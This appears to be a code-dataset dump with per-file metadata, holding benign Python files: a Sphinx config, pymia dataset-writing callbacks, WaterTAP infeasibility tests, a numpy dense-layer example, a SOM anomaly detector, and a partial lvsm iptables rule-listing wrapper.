hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
13948c88190e7862c9ca8494927bb8865b6216e8 | 4,919 | py | Python | _docs/source/conf.py | akaihola/importhook | 157765d2eacf036718ab8f9b7f17cf3f032bb470 | [
"MIT"
] | 8 | 2019-07-08T06:50:47.000Z | 2021-12-03T16:57:23.000Z | _docs/source/conf.py | akaihola/importhook | 157765d2eacf036718ab8f9b7f17cf3f032bb470 | [
"MIT"
] | 5 | 2020-03-09T16:57:25.000Z | 2021-03-07T17:53:21.000Z | _docs/source/conf.py | akaihola/importhook | 157765d2eacf036718ab8f9b7f17cf3f032bb470 | [
"MIT"
] | 3 | 2020-06-13T18:43:49.000Z | 2022-02-14T14:02:18.000Z | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'importhook'
copyright = '2018, Brett Langdon <me@brett.is>'
author = 'Brett Langdon <me@brett.is>'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = ''
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.githubpages',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
#
# Fix: ``language = None`` is no longer accepted by Sphinx >= 5 ("None is
# not a valid language code"); 'en' is the value None used to fall back to.
language = 'en'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'importhookdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',
    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'importhook.tex', 'importhook Documentation',
     'Brett Langdon \\textless{}me@brett.is\\textgreater{}', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'importhook', 'importhook Documentation',
     [author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'importhook', 'importhook Documentation',
     author, 'importhook', 'One line description of project.',
     'Miscellaneous'),
]
# -- Extension configuration ------------------------------------------------- | 30.74375 | 79 | 0.649726 |
682d98cf9e422adb12ea708c4910e45e51cedb79 | 10,352 | py | Python | pymia/data/creation/callback.py | NunoEdgarGFlowHub/pymia | 142842e322b2f712aa45850f23f4875dc2c0f493 | [
"Apache-2.0"
] | null | null | null | pymia/data/creation/callback.py | NunoEdgarGFlowHub/pymia | 142842e322b2f712aa45850f23f4875dc2c0f493 | [
"Apache-2.0"
] | null | null | null | pymia/data/creation/callback.py | NunoEdgarGFlowHub/pymia | 142842e322b2f712aa45850f23f4875dc2c0f493 | [
"Apache-2.0"
] | null | null | null | import os
import typing
import numpy as np
import pymia.data.conversion as conv
import pymia.data.definition as defs
import pymia.data.indexexpression as expr
import pymia.data.subjectfile as subj
from . import writer as wr
class Callback:
    """Hook interface invoked while a dataset is being created.

    Subclass this and hand the instance to :meth:`.Traverser.traverse` in
    order to write or post-process information extracted from the original
    data. All hooks are no-ops by default.
    """

    def on_start(self, params: dict):
        """Invoked once, before the traversal begins.

        Args:
            params (dict): Parameters provided by the :class:`.Traverser`;
                the keys differ from the ones passed to
                :meth:`.Callback.on_subject`.
        """
        pass

    def on_end(self, params: dict):
        """Invoked once, after the traversal has finished.

        Args:
            params (dict): Parameters provided by the :class:`.Traverser`;
                the keys differ from the ones passed to
                :meth:`.Callback.on_subject`.
        """
        pass

    def on_subject(self, params: dict):
        """Invoked once per traversed subject.

        Args:
            params (dict): Subject-specific information and data provided
                by the :class:`.Traverser`.
        """
        pass
class ComposeCallback(Callback):
    """Bundle several callbacks behind the single :class:`.Callback` API.

    Lets :meth:`.Traverser.traverse` work with a whole list of callbacks
    while only ever talking to one object.
    """

    def __init__(self, callbacks: typing.List[Callback]) -> None:
        """
        Args:
            callbacks (list): The :class:`.Callback` instances to delegate to.
        """
        self.callbacks = callbacks

    def on_start(self, params: dict):
        """Forward :meth:`.Callback.on_start` to every wrapped callback."""
        for callback in self.callbacks:
            callback.on_start(params)

    def on_end(self, params: dict):
        """Forward :meth:`.Callback.on_end` to every wrapped callback."""
        for callback in self.callbacks:
            callback.on_end(params)

    def on_subject(self, params: dict):
        """Forward :meth:`.Callback.on_subject` to every wrapped callback."""
        for callback in self.callbacks:
            callback.on_subject(params)
class MonitoringCallback(Callback):
    """Print progress information while the dataset is being created."""

    def on_start(self, params: dict):
        """Announce that the dataset creation has started."""
        print('start dataset creation')

    def on_subject(self, params: dict):
        """Print the current subject's name and position in the traversal."""
        current = params[defs.KEY_SUBJECT_INDEX]
        files = params[defs.KEY_SUBJECT_FILES]
        print('[{}/{}] {}'.format(current + 1, len(files), files[current].subject))

    def on_end(self, params: dict):
        """Announce that the dataset creation has finished."""
        print('dataset creation finished')
class WriteDataCallback(Callback):
    """Write every subject's raw data arrays to the dataset."""

    def __init__(self, writer: wr.Writer) -> None:
        """
        Args:
            writer (.creation.writer.Writer): The writer used to write the data.
        """
        self.writer = writer

    def on_subject(self, params: dict):
        """Write each category's data array for the current subject."""
        files = params[defs.KEY_SUBJECT_FILES]
        idx = params[defs.KEY_SUBJECT_INDEX]
        idx_str = defs.subject_index_to_str(idx, len(files))
        for category in params[defs.KEY_CATEGORIES]:
            payload = params[category]
            location = '{}/{}'.format(defs.LOC_DATA_PLACEHOLDER.format(category), idx_str)
            self.writer.write(location, payload, dtype=payload.dtype)
class WriteEssentialCallback(Callback):
    """Write the essential per-subject metadata: name and data shapes."""

    def __init__(self, writer: wr.Writer) -> None:
        """
        Args:
            writer (.creation.writer.Writer): The writer used to write the data.
        """
        self.writer = writer
        self.reserved_for_shape = False

    def on_start(self, params: dict):
        """Reserve one slot per subject for the subject names."""
        count = len(params[defs.KEY_SUBJECT_FILES])
        self.writer.reserve(defs.LOC_SUBJECT, (count,), str)
        self.reserved_for_shape = False

    def on_subject(self, params: dict):
        """Record the subject name and the shape of each category's data."""
        files = params[defs.KEY_SUBJECT_FILES]
        idx = params[defs.KEY_SUBJECT_INDEX]
        # Subject identifier/name goes into its reserved slot.
        self.writer.fill(defs.LOC_SUBJECT, files[idx].subject, expr.IndexExpression(idx))
        # Shape storage is reserved lazily here rather than in on_start,
        # because ndim is only known once the first subject's data exists.
        if not self.reserved_for_shape:
            for category in params[defs.KEY_CATEGORIES]:
                self.writer.reserve(defs.LOC_SHAPE_PLACEHOLDER.format(category),
                                    (len(files), params[category].ndim), dtype=np.uint16)
            self.reserved_for_shape = True
        for category in params[defs.KEY_CATEGORIES]:
            self.writer.fill(defs.LOC_SHAPE_PLACEHOLDER.format(category),
                             params[category].shape, expr.IndexExpression(idx))
class WriteImageInformationCallback(Callback):
    """Write the image information (shape, origin, direction, spacing) to the dataset."""

    def __init__(self, writer: wr.Writer, category=defs.KEY_IMAGES) -> None:
        """
        Args:
            writer (.creation.writer.Writer): The writer used to write the data.
            category (str): The category from which to extract the information from.
        """
        self.writer = writer
        self.category = category
        self.new_subject = False

    def on_start(self, params: dict):
        """Reserve storage for the image properties of every subject."""
        subject_count = len(params[defs.KEY_SUBJECT_FILES])
        self.writer.reserve(defs.LOC_IMGPROP_SHAPE, (subject_count, 3), dtype=np.uint16)
        # Bug fix: ``np.float`` was a deprecated alias of the builtin
        # ``float`` and was removed in NumPy 1.24, so ``dtype=np.float``
        # raises AttributeError on modern NumPy. ``float`` is a drop-in
        # replacement with identical semantics (stored as float64).
        self.writer.reserve(defs.LOC_IMGPROP_ORIGIN, (subject_count, 3), dtype=float)
        self.writer.reserve(defs.LOC_IMGPROP_DIRECTION, (subject_count, 9), dtype=float)
        self.writer.reserve(defs.LOC_IMGPROP_SPACING, (subject_count, 3), dtype=float)

    def on_subject(self, params: dict):
        """Write the current subject's image properties into their slots."""
        subject_index = params[defs.KEY_SUBJECT_INDEX]
        properties = params[defs.KEY_PLACEHOLDER_PROPERTIES.format(self.category)]  # type: conv.ImageProperties
        self.writer.fill(defs.LOC_IMGPROP_SHAPE, properties.size, expr.IndexExpression(subject_index))
        self.writer.fill(defs.LOC_IMGPROP_ORIGIN, properties.origin, expr.IndexExpression(subject_index))
        self.writer.fill(defs.LOC_IMGPROP_DIRECTION, properties.direction, expr.IndexExpression(subject_index))
        self.writer.fill(defs.LOC_IMGPROP_SPACING, properties.spacing, expr.IndexExpression(subject_index))
class WriteNamesCallback(Callback):
    """Write the entry names of every category to the dataset."""

    def __init__(self, writer: wr.Writer) -> None:
        """
        Args:
            writer (.creation.writer.Writer): The writer used to write the data.
        """
        self.writer = writer

    def on_start(self, params: dict):
        """Store the name list of each category once, up front."""
        for category in params[defs.KEY_CATEGORIES]:
            names = params[defs.KEY_PLACEHOLDER_NAMES.format(category)]
            self.writer.write(defs.LOC_NAMES_PLACEHOLDER.format(category), names, dtype='str')
class WriteFilesCallback(Callback):
    """Write the subjects' file paths (relative to a common root) to the dataset."""

    def __init__(self, writer: wr.Writer) -> None:
        """
        Args:
            writer (.creation.writer.Writer): The writer used to write the data.
        """
        self.writer = writer
        self.file_root = None

    @staticmethod
    def _get_common_path(subject_files):
        # First the common path within each subject's own files,
        # then the common path across all subjects.
        per_subject = [os.path.commonpath(list(sf.get_all_files().values()))
                       for sf in subject_files]
        return os.path.commonpath(per_subject)

    def on_start(self, params: dict):
        """Determine the shared root path and reserve space for all file names."""
        files = params[defs.KEY_SUBJECT_FILES]
        self.file_root = self._get_common_path(files)
        if os.path.isfile(self.file_root):  # only happens when there is just one file
            self.file_root = os.path.dirname(self.file_root)
        self.writer.write(defs.LOC_FILES_ROOT, self.file_root, dtype='str')
        for category in params[defs.KEY_CATEGORIES]:
            name_count = len(params[defs.KEY_PLACEHOLDER_NAMES.format(category)])
            self.writer.reserve(defs.LOC_FILES_PLACEHOLDER.format(category),
                                (len(files), name_count), dtype='str')

    def on_subject(self, params: dict):
        """Write each file path of the current subject, relative to the root."""
        idx = params[defs.KEY_SUBJECT_INDEX]
        current = params[defs.KEY_SUBJECT_FILES][idx]  # type: subj.SubjectFile
        for category in params[defs.KEY_CATEGORIES]:
            for entry_idx, file_name in enumerate(current.categories[category].entries.values()):
                rel = os.path.relpath(file_name, self.file_root)
                where = expr.IndexExpression(indexing=[idx, entry_idx], axis=(0, 1))
                self.writer.fill(defs.LOC_FILES_PLACEHOLDER.format(category), rel, where)
def get_default_callbacks(writer: wr.Writer, meta_only=False) -> ComposeCallback:
    """Assemble the commonly used callbacks for a dataset creation run.

    Args:
        writer (.creation.writer.Writer): The writer used to write the data.
        meta_only (bool): Whether only callbacks for a metadata dataset
            creation should be returned.

    Returns:
        Callback: The composed selection of common callbacks.
    """
    selection = [
        MonitoringCallback(),
        WriteDataCallback(writer),
        WriteFilesCallback(writer),
        WriteImageInformationCallback(writer),
        WriteEssentialCallback(writer),
    ]
    # The name lists are not needed for a metadata-only dataset.
    if not meta_only:
        selection.append(WriteNamesCallback(writer))
    return ComposeCallback(selection)
| 38.917293 | 124 | 0.660452 |
a37e3f0e6a7fe688ee02766f2e83a31e3a7cfee0 | 3,613 | py | Python | watertap/core/util/tests/test_infeasible.py | srikanthallu/watertap | 6ad5552b91163917fb19342754b9b57b3d9cbd85 | [
"BSD-3-Clause-LBNL"
] | 4 | 2021-11-06T01:13:22.000Z | 2022-02-08T21:16:38.000Z | watertap/core/util/tests/test_infeasible.py | srikanthallu/watertap | 6ad5552b91163917fb19342754b9b57b3d9cbd85 | [
"BSD-3-Clause-LBNL"
] | 233 | 2021-10-13T12:53:44.000Z | 2022-03-31T21:59:50.000Z | watertap/core/util/tests/test_infeasible.py | srikanthallu/watertap | 6ad5552b91163917fb19342754b9b57b3d9cbd85 | [
"BSD-3-Clause-LBNL"
] | 12 | 2021-11-01T19:11:03.000Z | 2022-03-08T22:20:58.000Z | ###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
import pytest
from pyomo.environ import ConcreteModel, Var, Constraint
from idaes.core.util import get_solver
from watertap.core.util.infeasible import (
print_infeasible_constraints,
print_infeasible_bounds,
print_variables_close_to_bounds,
print_constraints_close_to_bounds,
print_close_to_bounds,
)
class TestInfeasible:
    """Exercise the infeasibility/bound reporting helpers on a tiny model."""
    @pytest.fixture(scope="class")
    def m(self):
        # Class-scoped fixture: the SAME model instance flows through all
        # tests below, so variable values set in one test carry over.
        m = ConcreteModel()
        m.a = Var(bounds=(0, 10))
        m.b = Var(bounds=(-10, 10))
        # Range constraint: 0 <= a + b <= 10.
        m.abcon = Constraint(expr=(0, m.a + m.b, 10))
        return m
    @pytest.mark.unit
    def test_var_not_set(self, m, capsys):
        # Unset variables should be reported, not crash the check.
        print_variables_close_to_bounds(m)
        captured = capsys.readouterr()
        assert (
            captured.out
            == """No value for Var a
No value for Var b
"""
        )
    @pytest.mark.unit
    def test_var_not_set_con(self, m, capsys):
        # A constraint cannot be evaluated while its variables are unset.
        print_constraints_close_to_bounds(m)
        captured = capsys.readouterr()
        assert (
            captured.out
            == """Cannot evaluate Constraint abcon: missing variable value
"""
        )
    @pytest.mark.unit
    def test_not_close(self, m, capsys):
        # Values comfortably inside the bounds produce no output at all.
        m.a.value = 2
        m.b.value = 2
        print_close_to_bounds(m)
        captured = capsys.readouterr()
        assert captured.out == ""
    @pytest.mark.unit
    def test_close_UB(self, m, capsys):
        # a at its upper bound also pushes the constraint body to its UB.
        m.a.value = 10
        m.b.value = 0
        print_close_to_bounds(m)
        captured = capsys.readouterr()
        assert (
            captured.out
            == """a near UB of 10
abcon near UB of 10
"""
        )
    @pytest.mark.unit
    def test_close_LB(self, m, capsys):
        # a at UB and b at LB: both variables and the constraint LB reported.
        m.a.value = 10
        m.b.value = -10
        print_close_to_bounds(m)
        captured = capsys.readouterr()
        assert (
            captured.out
            == """a near UB of 10
b near LB of -10
abcon near LB of 0
"""
        )
    @pytest.mark.unit
    def test_infeasible_bounds_none(self, m, capsys):
        # Values left by the previous test (10, -10) are within bounds.
        print_infeasible_bounds(m)
        captured = capsys.readouterr()
        assert captured.out == ""
    @pytest.mark.unit
    def test_infeasible_constraints_none(self, m, capsys):
        # a + b = 10 + (-10) = 0 satisfies the 0..10 range constraint.
        print_infeasible_constraints(m)
        captured = capsys.readouterr()
        assert captured.out == ""
    @pytest.mark.unit
    def test_infeasible_bounds(self, m, capsys):
        # Values outside both bounds are listed with the violated bound.
        m.a.value = 20
        m.b.value = -20
        print_infeasible_bounds(m)
        captured = capsys.readouterr()
        assert (
            captured.out
            == """VAR a: 20 </= UB 10
VAR b: -20 >/= LB -10
"""
        )
    @pytest.mark.unit
    def test_infeasible_constraints(self, m, capsys):
        # b is still -20 from the previous test, so the body is -20 + -20 = -40,
        # which violates the constraint's 0..10 range.
        m.a.value = -20
        print_infeasible_constraints(m)
        captured = capsys.readouterr()
        assert (
            captured.out
            == """CONSTR abcon: 0.0 </= -40 <= 10.0
"""
        )
| 28.674603 | 81 | 0.587877 |
11516f25c40aee831ef345a9fd53d3e45ef6965d | 2,145 | py | Python | 04_NEURAL_NETWORKS/cap_03_adding_layers/dense_layer.py | san99tiago/ML_BASICS | ebd51827f7dd427c848b5c8e1d4bfd017d2fb56f | [
"MIT"
] | 2 | 2021-03-18T06:07:09.000Z | 2021-05-08T22:14:14.000Z | 04_NEURAL_NETWORKS/cap_03_adding_layers/dense_layer.py | san99tiago/ML_BASICS | ebd51827f7dd427c848b5c8e1d4bfd017d2fb56f | [
"MIT"
] | null | null | null | 04_NEURAL_NETWORKS/cap_03_adding_layers/dense_layer.py | san99tiago/ML_BASICS | ebd51827f7dd427c848b5c8e1d4bfd017d2fb56f | [
"MIT"
] | null | null | null | # CODE FOR A DENSE LAYER OF NEURONS CLASS USING NUMPY
# SANTIAGO GARCIA ARANGO
import numpy as np
import nnfs
import matplotlib.pyplot as plt
from nnfs.datasets import spiral_data
# Initialize Neural Networks From Scratch package for following the book
# (pins numpy's default dtype and the random seed so the results below
# reproduce the book's examples exactly)
nnfs.init(dot_precision_workaround=True, default_dtype='float32', random_seed=0)
class DenseLayer:
    """
    DenseLayer is a class to create and process generalized neuron layers.

    :param n_inputs: number of inputs (features per sample)
    :param n_neurons: number of neurons in the layer
    """
    def __init__(self, n_inputs, n_neurons):
        # Initialize main layer with small random weights (shape:
        # n_inputs x n_neurons) and a zero row-vector for the biases.
        self.weights = 0.01 * np.random.randn(n_inputs, n_neurons)
        self.biases = np.zeros((1, n_neurons))

    def forward(self, inputs):
        """
        Apply the main forward pass: ``inputs @ weights + biases``.

        The result is stored in ``self.output`` (as before) and now also
        returned, so the layer can be used in chained expressions.

        :param inputs: array of shape (n_samples, n_inputs)
        :return: layer activations of shape (n_samples, n_neurons)
        """
        self.output = np.dot(inputs, self.weights) + self.biases
        return self.output
if __name__ == "__main__":
    # --------------- TEST FORWARD PASS WITH MY NEW CLASS --------------
    # Create dataset
    # 2D spiral size(X)=(samples*classes, 2) and size(y)=(samples*classes, 1)
    # Spiral has two features in the 2D plane and specific "classes" as output
    X, y = spiral_data(samples=100, classes=3)
    print("\n\n---------------- MY DATASET -----------------\n")
    print("shape(X):", np.shape(X), "... main training features\n")
    print("shape(y):", np.shape(y), "... output for each set of features\n")
    # Create dense layer with given "input features" and "output values"
    # (2 input features -> 3 neurons, matching the spiral's 3 classes)
    dense_1 = DenseLayer(2, 3)
    print("\n\n--------- DENSE LAYER INITIALIZING ----------\n")
    print("shape(dense_1.weights):", np.shape(dense_1.weights), "\n")
    print("shape(dense_1.biases):", np.shape(dense_1.biases), "\n")
    # Perform a forward pass of our training data through this layer
    dense_1.forward(X)
    # See output of the first samples
    print("\n\n--------- FORWARD PASS ----------\n *Only some of them...\n")
    print(dense_1.output[:5])
    # Visualize dataset graphically (color = class label)
    plt.figure()
    plt.scatter(X[:, 0], X[:, 1], c=y, cmap="brg")
    plt.title("Santi's spiral dataset")
| 36.355932 | 80 | 0.64662 |
910b2fc5e7bf03bbf8e3ec1b1cbf829bb582a764 | 3,219 | py | Python | som_anomaly_detector/anomaly_detection.py | FlorisHoogenboom/som-anomaly-detector | 40a84665ec322850792015bfa84c7c287f0956f5 | [
"MIT"
] | 27 | 2017-07-27T00:13:20.000Z | 2022-03-20T13:10:15.000Z | som_anomaly_detector/anomaly_detection.py | FlorisHoogenboom/som-anomaly-detector | 40a84665ec322850792015bfa84c7c287f0956f5 | [
"MIT"
] | 3 | 2017-07-28T00:27:44.000Z | 2020-06-08T18:20:35.000Z | som_anomaly_detector/anomaly_detection.py | FlorisHoogenboom/som-anomaly-detector | 40a84665ec322850792015bfa84c7c287f0956f5 | [
"MIT"
] | 14 | 2017-11-28T04:04:28.000Z | 2022-03-20T13:10:17.000Z | import numpy as np
from sklearn.neighbors import NearestNeighbors
from som_anomaly_detector.kohonen_som import KohonenSom
class AnomalyDetection(KohonenSom):
    """Anomaly detector built on a Kohonen self-organizing map.

    The SOM is fitted on training data; nodes that attract too few samples
    are pruned, and new observations are scored by their mean distance to
    the k nearest remaining nodes.
    """

    def __init__(
        self,
        shape,
        input_size,
        learning_rate,
        learning_decay=0.1,
        initial_radius=1,
        radius_decay=0.1,
        min_number_per_bmu=1,
        number_of_neighbors=3,
    ):
        super(AnomalyDetection, self).__init__(
            shape,
            input_size,
            learning_rate,
            learning_decay,
            initial_radius,
            radius_decay,
        )
        # Nodes mapped to fewer than this many training samples are pruned.
        self.minNumberPerBmu = min_number_per_bmu
        # k used for the k-nearest-neighbor anomaly score.
        self.numberOfNeighbors = number_of_neighbors

    def get_bmu_counts(self, training_data):
        """Count, for every SOM node, how many training samples map to it.

        :param training_data: numpy array of training data
        :return: array shaped like the SOM grid holding the BMU counts
        """
        bmu_counts = np.zeros(shape=self.shape)
        for observation in training_data:
            bmu = self.get_bmu(observation)
            bmu_counts[bmu] += 1
        return bmu_counts

    def fit(self, training_data, num_iterations):
        """Fit the anomaly detection model to some training data.

        Nodes that attracted fewer than ``minNumberPerBmu`` samples are
        removed from the set of allowed nodes.

        :param training_data: numpy array of training data
        :param num_iterations: number of iterations allowed for training
        :return: the array of allowed (sufficiently used) nodes
        """
        self.reset()
        super(AnomalyDetection, self).fit(training_data, num_iterations)
        bmu_counts = self.get_bmu_counts(training_data)
        self.bmu_counts = bmu_counts.flatten()
        self.allowed_nodes = self.grid[bmu_counts >= self.minNumberPerBmu]
        return self.allowed_nodes

    def evaluate(self, evaluationData):
        """Score observations by their mean distance to the k nearest nodes.

        :param evaluationData: numpy array of the data to be evaluated
        :return: 1D-array with an anomaly measure per observation
        :raises Exception: if :meth:`fit` was not called first, or pruning
            left fewer than two allowed nodes
        """
        # Bug fix: accessing a missing attribute raises AttributeError, not
        # NameError, so the original ``except NameError`` guard could never
        # catch the "fit not called" case. Use an explicit hasattr check.
        if not hasattr(self, 'allowed_nodes'):
            raise Exception(
                "Make sure the method fit is called before evaluating data."
            )
        if self.allowed_nodes.shape[0] <= 1:
            raise Exception(
                "There are no nodes satisfying the minimum criterium, algorithm cannot proceed."
            )
        classifier = NearestNeighbors(n_neighbors=self.numberOfNeighbors)
        classifier.fit(self.allowed_nodes)
        dist, _ = classifier.kneighbors(evaluationData)
        return dist.mean(axis=1)
| 36.579545 | 98 | 0.645231 |
7c3692a5e323a3152dd65dcfb4555352d444b84f | 6,239 | py | Python | lvsm/firewall.py | khosrow/lvsm | 516ee1422f736d016ccc198e54f5f019102504a6 | [
"MIT"
] | 15 | 2015-03-18T21:45:24.000Z | 2021-02-22T09:41:30.000Z | lvsm/firewall.py | khosrow/lvsm | 516ee1422f736d016ccc198e54f5f019102504a6 | [
"MIT"
] | 12 | 2016-01-15T19:32:36.000Z | 2016-10-27T14:21:14.000Z | lvsm/firewall.py | khosrow/lvsm | 516ee1422f736d016ccc198e54f5f019102504a6 | [
"MIT"
] | 8 | 2015-03-20T00:24:56.000Z | 2021-11-19T06:21:19.000Z | """Firewall funcationality"""
import subprocess
import socket
import utils
import termcolor
import logging
logger = logging.getLogger('lvsm')
class Firewall():
    """Thin wrapper around the ``iptables`` binary.

    Each ``show*`` method shells out to iptables, optionally colorizes the
    output with termcolor, and returns the report as a list of display
    lines (an empty list on execution error).

    NOTE(review): the AttributeError fallbacks below target Python 2.6
    (no ``subprocess.check_output``) and stdout is treated as ``str``;
    under Python 3 ``check_output`` returns ``bytes`` and the later
    ``output.split`` calls would fail. Confirm the target interpreter.
    """
    def __init__(self, iptables):
        # Path to (or name of) the iptables executable to invoke.
        self.iptables = iptables
    def show(self, numeric, color):
        """Return the filter-table rules, optionally numeric and colorized."""
        args = [self.iptables, "-L", "-v"]
        if numeric:
            args.append("-n")
        try:
            try:
                logger.info("Running: %s" % " ".join(args))
                output = subprocess.check_output(args)
            # python 2.6 compatibility code
            except AttributeError as e:
                output, stderr = subprocess.Popen(args, stdout=subprocess.PIPE).communicate()
        except OSError as e:
            logger.error("problem with iptables - %s : %s" % (e.strerror , args[0]))
            return list()
        result = ['', 'IP Packet filter rules']
        result += ['======================']
        if color:
            # Colorize verdicts: ACCEPT green, REJECT/DROP red; chain
            # header lines and everything else stay uncolored.
            for line in output.split('\n'):
                if 'Chain' not in line and 'ACCEPT' in line:
                    result.append(termcolor.colored(line, 'green'))
                elif 'Chain' not in line and ('REJECT' in line or 'DROP' in line):
                    result.append(termcolor.colored(line, 'red'))
                else:
                    result.append(line)
        else:
            result += output.split('\n')
        return result
    def show_nat(self, numeric):
        """Return the NAT-table rules as display lines (never colorized)."""
        args = [self.iptables, "-t", "nat", "-L", "-v"]
        if numeric:
            args.append("-n")
        try:
            try:
                logger.info("Running: %s" % " ".join(args))
                output = subprocess.check_output(args)
            # python 2.6 compatibility code
            except AttributeError as e:
                output, stderr = subprocess.Popen(args, stdout=subprocess.PIPE).communicate()
        except OSError as e:
            logger.error("Problem with iptables - %s : %s " % (e.strerror, args[0]))
            return list()
        result = ['', 'NAT rules', '=========']
        result += output.split('\n')
        return result
    def show_mangle(self, numeric, color, fwm=None):
        """Show the iptables mangle table"""
        args = [self.iptables, '-t', 'mangle', '-L', '-v']
        if numeric:
            args.append('-n')
        try:
            try:
                logger.info("Running: %s" % " ".join(args))
                output = subprocess.check_output(args)
            # python 2.6 compat code
            except AttributeError as e:
                output, stderr = subprocess.Popen(args, stdout=subprocess.PIPE).communicate()
        except OSError as e:
            logger.error("Problem with iptables - %s : %s" % (e.strerror, args[0]))
            return list()
        result = list()
        if output:
            lines = output.split('\n')
            # Find which column contains the destination
            #header = lines[1].split()
            #try:
            #    index = header.index('destination')
            #except ValueError as e:
            #    index = -1
            for line in lines:
                tokens = line.split()
                # NOTE(review): both branches append the line, so the ``fwm``
                # argument currently has no filtering effect; presumably the
                # else-branch was meant to be skipped when fwm is given —
                # confirm the intended behavior before changing it.
                if fwm and hex(fwm) in tokens:
                    result.append(line)
                else:
                    result.append(line)
            result.insert(0, '')
            result.insert(1, 'Mangle rules')
            result.insert(2, '============')
        return result
    def show_virtual(self, host, port, protocol, numeric, color):
        """Return the INPUT-chain rules matching a virtual host/port/protocol."""
        result = list()
        args = [self.iptables, '-L', 'INPUT']
        if port:
            # Resolve the port to both its number and (if any) service name,
            # so either "dpt:http" or "dpt:80" style output can match.
            portnum = utils.getportnum(port)
            try:
                portname = socket.getservbyport(int(portnum))
            except socket.error:
                # No service name registered for this port: fall back to number.
                portname = portnum
            except OverflowError as e:
                logger.error("%s" % e)
                return list()
        if numeric:
            args.append('-n')
            hostnames = utils.gethostbyname_ex(host)
        else:
            # Turn this into a list so it behaves like the above case
            # And we only perform a list membership check
            hostnames = [socket.getfqdn(host)]
        # Nested try/except needed to catch exceptions in the "Except"
        try:
            try:
                logger.info("Running: %s" % " ".join(args))
                output = subprocess.check_output(args)
            # python 2.6 compatibility code
            except AttributeError as e:
                output, stderr = subprocess.Popen(args, stdout=subprocess.PIPE).communicate()
        except OSError as e:
            logger.error("Problem with iptables - %s : %s" % (e.strerror, args[0]))
            return list()
